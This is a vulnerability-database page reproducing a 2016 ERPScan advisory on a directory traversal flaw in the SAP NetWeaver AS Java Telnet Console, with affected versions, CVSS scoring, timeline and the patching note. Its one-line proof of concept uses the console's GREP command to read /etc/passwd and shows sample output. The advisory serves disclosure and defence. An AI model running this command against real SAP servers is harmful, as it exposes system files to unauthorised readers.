Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SAP NetWeaver AS JAVA 7.5 Directory Traversal Vulnerability

🗓️ 19 Nov 2016 00:00:00Reported by Mathieu GeliType 
zdt
 zdt🔗 0day.today👁 31 Views

SAP NetWeaver AS JAVA 7.5 Directory Traversal Vulnerability, allows file disclosure outside of JVM through Telnet Console servic

Code
Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.1 to 7.5

Vendor URL: http://SAP.com

Bugs: Directory traversal

Sent:  04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note  2280371

Author:   Mathieu Geli (ERPScan)



Description


1. ADVISORY INFORMATION

Title: [ERPSCAN-16-032] SAP Telnet Console a Directory traversal vulnerability

Advisory ID:[ERPSCAN-16-032]

Risk: high

Advisory URL: https://erpscan.com/advisories/erpscan-16-032-sap-netweaver-telnet-console-file-disclosure/

Date published: 11.11.2016

Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: Directory traversal

Impact: read file from system

Remotely Exploitable: yes

Locally Exploitable: yes



CVSS Information

CVSS Base Score v3:   3.4 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Adjacent (A)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) High (H)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component)

Changed (C)

C : Impact to Confidentiality

Low (L)

I : Impact to Integrity None (N)

A : Impact to Availability None (N)



3. VULNERABILITY DESCRIPTION

An authenticated user can disclose file content outside of the JVM
through the SAP Telnet Console service.


4. VULNERABLE PACKAGES

J2EE ENGINE SERVERCORE 7.10

J2EE ENGINE SERVERCORE 7.11

J2EE ENGINE SERVERCORE 7.20

J2EE ENGINE SERVERCORE 7.30

J2EE ENGINE SERVERCORE 7.31

J2EE ENGINE SERVERCORE 7.40

J2EE ENGINE SERVERCORE 7.50


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note  2280371



6. AUTHOR

  Mathieu Geli (ERPScan)


7. TECHNICAL DESCRIPTION


SAP Netweaver Telnet Console File Disclosure via the GREP command of
the SYSTEM admin group.


7.1. Proof of Concept


GREP ":" /etc/passwd


at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash

bin:x:1:1:bin:/bin:/bin/bash

daemon:x:2:2:Daemon:/sbin:/bin/bash

[...]


8. REPORT TIMELINE

Sent: 04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 09.08.2016


9. REFERENCES

https://erpscan.com/advisories/erpscan-16-032-sap-netweaver-telnet-console-file-disclosure/

#  0day.today [2018-04-11]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Nov 2016 00:00Current
0.2Low risk
Vulners AI Score0.2
sap netweaverdirectory traversalfile disclosuretelnet consoleerpscansecurity note
31